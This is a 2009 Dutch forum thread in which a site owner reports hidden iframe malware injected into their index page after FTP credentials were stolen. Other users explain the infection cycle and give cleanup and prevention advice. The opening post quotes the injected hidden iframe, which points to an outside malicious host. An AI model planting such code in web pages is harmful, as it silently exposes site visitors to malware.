FortunaHome | maandag 13 juli 2009 @ 20:27 |
Hallo, Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in: <iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe> Iemand enig idee wat de fuck dit is en hoe dat daar komt???? | |
Ezechielk | maandag 13 juli 2009 @ 20:31 |
Wat dit is? Een virus. Hoe het er komt? Iemand heeft je index aangepast? Hoe? Lekke server, brakke code of brakke FTP gegevens. | |
Bill_E | maandag 13 juli 2009 @ 20:33 |
quote:lift | |
-_Tommy_- | maandag 13 juli 2009 @ 20:33 |
een verwijzing naar een andere site/bestand... hoe dat komt? omdat je je beveiliging te laag hebt staan! | |
FortunaHome | maandag 13 juli 2009 @ 20:39 |
Het schijnt idd dat een of ander virus in imloop is wat ftp gegevens steelt en zijn eigen kutlinks in je php bestanden kopieert... echt welke nerd maakt zon kankerprogramme... opknopen zoiets | |
AquaMaryn | maandag 13 juli 2009 @ 20:42 |
Er heeft waarschijnlijk ooit een virus of trojan op je computer gestaan (als ie er nog niet steeds op staat), die iframes automatisch wegschrijft naar alle bestanden waar HTML in zit. Als je zo'n html bestand vervolgens op je site zet zonder de source code te checken krijg je dit soort dingen. Tip: alle html bestanden checken op iframes en die eruit gooien. (Gewoon alle code tussen/inclusief <iframe....></iframe>) Dan ook je computer scannen. Bij mij vind Avast! iig foute iframes. Je kan dit al doen door via Windows te zoeken naar *.html, *.htm, *.php, *.asp bestanden die het woord 'iframe' bevatten, geloof ik. Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp... | |
CasB | maandag 13 juli 2009 @ 20:42 |
Lekkere server als je ftp-gegevens gejat worden. ![]() | |
Riparius | maandag 13 juli 2009 @ 20:46 |
quote:Kijk ook even of je site al op de zwarte lijst staat van Google. Gaat het eenvoudigst als je een site bezoekt met FireFox, je krijgt dan in plaats van de site in kwestie een rood waarschuwingsscherm te zien. De laatste tijd zijn er veel besmette websites gesignaleerd. Dat werkt als volgt: 1. Iemand bezoekt een (bonafide) reeds besmette website, die de computer van de bezoeker infecteert. 2. Een stukje malware op de zojuist besmette computer gaat op zoek naar FTP inloggegevens. Worden deze gevonden, dan worden ze doorgegeven aan de maker (c.q. verspreider) van de malware. 3. De maker c.q. verspreider van de malware gebruikt de buitgemaakte inloggegevens om de betreffende websites aan te passen c.q. te infecteren met een stukje obfuscated javascript o.i.d. 4. Nietsvermoedende bezoekers blijven de voorheen als betrouwbaar bekend staande site bezoeken, waardoor ook hún computers worden geïnfecteerd. 5. Ga terug naar stap 1 om te lezen wat er nu weer met deze computers gebeurt ... Op deze manier ontstaat dus een soort sneeuwbaleffect. Je moet in ieder geval de computer(s) die je hebt gebruikt voor het updaten van je site onderzoeken op malware, tenminste één hiervan is besmet. Je moet natuurlijk ook meteen het FTP wachtwoord dat je gebruikt om je site te updaten wijzigen, want je inloggegevens zijn immers gestolen. En je moet alle pagina's van je site nakijken. Als je al op de zwarte lijst van Google terecht bent gekomen, dan kun je na het opschonen een verzoek indienen om je site opnieuw te laten scannen. Wordt de site dan clean bevonden, dan wordt deze weer van de zwarte lijst gehaald. | |
Donders | maandag 13 juli 2009 @ 20:53 |
Sterkte TS! | |
FortunaHome | maandag 13 juli 2009 @ 20:55 |
Wachtwoord is gewijzigd en ik heb ook de clown gevonden met dit virus op zijn pc. Het lijkt er vooralsnog op dat alleen bestanden die met index beginnen zijn aangetast | |
ukker | maandag 13 juli 2009 @ 21:13 |
Heb een aantal weken geleden hetzelfde gehad.. 6 (!) van mijn sites waren geïnfecteerd. Scannen met ad-aware en nod32, alle ftp wachtwoorden wijzigen (van een aantal had ik geen plesk of root toegang, moest ik weer heen en weer bellen met de hoster) en je bestanden opnieuw uploaden does the trick. Bij sommige sites heb ik 2 weken lang elke dag het html bestand moeten downloaden en de iframe moeten verwijderen, op een vast tijdstip (half 8 smorgens) werd het automatisch weer geplaatst door een of ander kutscript die de hackers gebruiken.. Verder herken je de hidden iframe's meestal vet snel omdat het heel je layout verneukt. Hadden ze beter anders kunnen doen met een hidden div maargoed, dood aan die kuthackers. | |
Adidah | maandag 13 juli 2009 @ 21:16 |
Om deze reden zou ik dus nooit een web server ook als werkstation gebruiken ![]() | |
Ame_thyst | maandag 13 juli 2009 @ 21:16 |
Ook last van gehad. Bewijst maar weer hoe kut windows is. | |
Ame_thyst | maandag 13 juli 2009 @ 21:16 |
quote:Wat heeft dat er nu weer mee te maken? | |
Adidah | maandag 13 juli 2009 @ 21:19 |
quote:Nou, wat denk je zelf? | |
fotostarter | maandag 13 juli 2009 @ 21:40 |
quote:Ik kom nooit op die site ![]() | |
Ame_thyst | maandag 13 juli 2009 @ 22:22 |
quote:Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers. Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul. | |
ukker | maandag 13 juli 2009 @ 22:24 |
quote:Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten ![]() | |
AquaMaryn | maandag 13 juli 2009 @ 22:25 |
quote:Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen... | |
Adidah | maandag 13 juli 2009 @ 22:34 |
quote: quote: quote:Daarom moet je dus ook geen wachtwoorden laten onthouden ![]() | |
AquaMaryn | maandag 13 juli 2009 @ 22:36 |
quote:I know, maar het is zo makkelijk!! Wachtwoorden van websites sla ik sowieso nooit op, maar aan FTP had ik eigenlijk nooit gedacht, dat zit ten slotte in een apart client... maar daar heb je dus ook niets aan. ![]() | |
doppendoosch | dinsdag 14 juli 2009 @ 00:09 |
quote:Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan. | |
AquaMaryn | dinsdag 14 juli 2009 @ 01:17 |
quote:Totdat slimme hackertjes die keyring weer weten te kraken... ![]() | |
FortunaHome | dinsdag 14 juli 2009 @ 10:21 |
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets. Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet. Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten ![]() | |
L0we | dinsdag 14 juli 2009 @ 10:35 |
quote:Waarschijnlijk is het gewoon een scriptkiddy die zich even lekker aan het uitleven was. Beetje slim omgaan met je inloggegevens ljikt me ook wel het meest vanzelfsprekende imho. ![]() | |
whoops | dinsdag 14 juli 2009 @ 10:46 |
FTP ![]() ![]() | |
FortunaHome | dinsdag 14 juli 2009 @ 11:08 |
quote:Ja FTP ja... het moet een beetje simpel blijven om te updaten he... Het is een vrije tijds pagina die door vrijwilligers omhoog wordt gehouden. Maarja, je hebt altijd van die betweters als jij natuurlijk ![]() | |
CasB | dinsdag 14 juli 2009 @ 11:11 |
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt. ![]() | |
Tuvai.net | dinsdag 14 juli 2009 @ 11:27 |
Dan ben je toch wel erg brak beveiligd als je ZULKE rotzooi op je computer hebt. ![]() | |
wdn | dinsdag 14 juli 2009 @ 11:35 |
quote:ssh, rcp, scp? | |
whoops | dinsdag 14 juli 2009 @ 11:48 |
quote:Dude... ![]() quote:RCP is ook unencrypted, dus onveilig... Iets over SSH (SCP, SFTP, of SVN+SSH) zijn wat mij betreft de way to go... ![]() | |
wdn | dinsdag 14 juli 2009 @ 11:49 |
Ok, geen rcp dan ![]() CasB: FTP is zo LEK als een mandje. Dat is wat er mis mee is. | |
FortunaHome | dinsdag 14 juli 2009 @ 11:53 |
En hoe ga ik mensen die de hele dag op hun werk zitten en 's avonds in hun vrije tijd de pagina wat updaten uitleggen dat ze dit soort tools moeten gaan gebruiken ![]() Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar... | |
wdn | dinsdag 14 juli 2009 @ 11:56 |
quote:ssh gaat op zelfde manier als ftp. Is alleen een andere poort ![]() OpenSSH maakt bijvoorbeeld gebruik van sftp (secure ftp) ipv ftp. | |
doppendoosch | dinsdag 14 juli 2009 @ 12:57 |
quote:Dat gebeurt niet, want als dat zo makkelijk gaat kun je net zo goed gelijk die FTP-server kraken zonder omweg. | |
mschol | dinsdag 14 juli 2009 @ 13:59 |
quote:allemaal protocollen die niet gemaakt zijn voor bestandsoverdracht.. ik heb gelukkig gewoon lokaal toegang tot server ![]() | |
whoops | dinsdag 14 juli 2009 @ 14:11 |
quote:mscheel weet weer eens perfect waar 'ie het over heeft hoor... ![]() quote:Dude, lees je eens in voordat je dom gaat lopen bazelen, uberdummy... Bah bah... | |
Ame_thyst | dinsdag 14 juli 2009 @ 14:15 |
Ja maar ik heb toch een firewall![]() | |
slacker_nl | dinsdag 14 juli 2009 @ 14:16 |
Whoops, niet iedereen heeft een eigen server en ik denk dat de meeste hosters alleen maar FTP access aanbieden voor eea. Zodra je een eigen server hebt is sftp wel de way to go. | |
whoops | dinsdag 14 juli 2009 @ 18:04 |
quote:You are right ![]() Hoogste tijd dus dat hosters standaard een veiliger methode gebruiken. Het is echt niets moeilijker dan FTP, zoals hier gesuggereerd wordt. | |
MikeyMo | zondag 9 augustus 2009 @ 22:28 |
Dit probleem doemt nu bij mij ook op op mijn door Joomla gestuurde site. Echter zit ik thuis hier op een Mac. Ik run voor de zekerheid een virusscanner maar het lijkt me een beetje niet mogelijk dat ik een trojan zou hebben. De enkele andere plek waarop FTP gegevens van mijn server staan is op de windows PC op mijn werk, maar ik ben al sinds 1,5e week vrij. Het lijkt me niet dat zo'n script 10 dagen gaat wachten met het hacken van een server. Dan zou enkel een collega die op mijn computer heeft gezeten iets verdachts moeten hebben bekeken. Maar ja, dit houdt in dat ook alle sites van ons en onze klanten gevaar lopen, maar tot nu toe heb ik nog niets raars gezien op die sites. | |
MikeyMo | zondag 9 augustus 2009 @ 22:31 |
Overigens had de webhoster het erover dat het meer leek op Brute Force aangezien er zeker 825 keer geprobeerd was in te loggen oid. Dat lijkt me vaag aangezien je met hetw achtwoord wat je hebt gekaapt in 1x goed zit. | |
Qwea | zondag 9 augustus 2009 @ 22:32 |
IP's blokkeren op ftp server Topic aangemaakt ook al over MM zn probleem | |
mschol | zondag 9 augustus 2009 @ 22:35 |
[ Bericht 38% gewijzigd door mschol op 10-08-2009 00:29:19 ] | |
MailGozer | maandag 10 augustus 2009 @ 09:02 |
quote:Webserver draait op Unix. | |
MikeyMo | maandag 10 augustus 2009 @ 09:08 |
quote:ja, maar het virus wat de wachtwoorden zoekt en doorspeelt werkt in een windowsomgeving en kennelijk is het dus gewoon mogelijk dat wanneer een iframe wordt aangeroepen in een pagina met daarop een trojan windows zonder problemen deze gaat runnen. | |
Qwea | maandag 10 augustus 2009 @ 15:54 |
![]() Komt binnen via adobe reader en adobe flash. Dr zitten lekker in. Updaten, van de abode shizzle is een must. Ik hou van avast die een mooi alarm geeft en schreeuwt dat er een bad iframe is ![]() | |
#ANONIEM | dinsdag 11 augustus 2009 @ 15:28 |
quote:Tot ze een keylogger oid op hun pc hebben staan ![]() | |
CasB | dinsdag 11 augustus 2009 @ 15:34 |
Volgens mij jat die malware sowieso je logingegevens, ook al sla je ze niet op, omdat ik ergens las dat het je internetverkeer monitort. Dus op het moment dat je gaat ftp'en, komt er toch een keer je wachtwoord voorbij. ![]() | |
Ilogic32 | maandag 21 september 2009 @ 18:04 |
Het virus zit in een gekraakte versie van flashfxp!!! Dus let op wat je download ook bij newsgroepen |